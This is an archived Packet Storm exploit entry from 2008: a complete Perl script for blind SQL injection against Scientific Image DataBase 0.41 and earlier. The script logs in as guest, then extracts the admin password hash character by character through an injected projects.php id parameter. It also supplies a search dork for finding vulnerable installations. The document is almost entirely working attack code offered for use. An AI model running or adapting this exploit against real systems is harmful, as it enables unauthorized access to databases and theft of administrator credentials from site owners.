scientific-sql.txt

2008-06-23T00:00:00
ID PACKETSTORM:67554
Type packetstorm
Reporter t0pp8uzz
Modified 2008-06-23T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
  
# Download: http://sidb.sourceforge.net/  
# Dork: "Scientific Image DataBase"  
# This exploit retrives the admin username/password via blind mysql injection.  
  
  
print <<INFO; # heredocs is ugly.. so is my INFO ;)  
-------------------------------------  
- Scientific Image DataBase <= 0.41 -  
- Blind SQL Injection Exploit -  
- -  
- Coded && Discovered By: t0pP8uZz -  
- Discovered On: 19 JUNE 2008 -  
-------------------------------------  
-Greetz: muts, perlunderground, h-y -  
- cipher, milw0rm -  
-------------------------------------  
  
INFO  
  
print "Enter URL(ie: http://site.com): ";  
chomp(my $url=<STDIN>);  
  
my ($substr, $done, $chr, $res) = (1, 1, 48, "");  
  
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );  
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );  
  
while($done) {  
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);  
  
if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }  
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }  
else { $chr++; }  
}  
print "Username: sysadmin Password: ".$res."\n";  
exit;  
  
`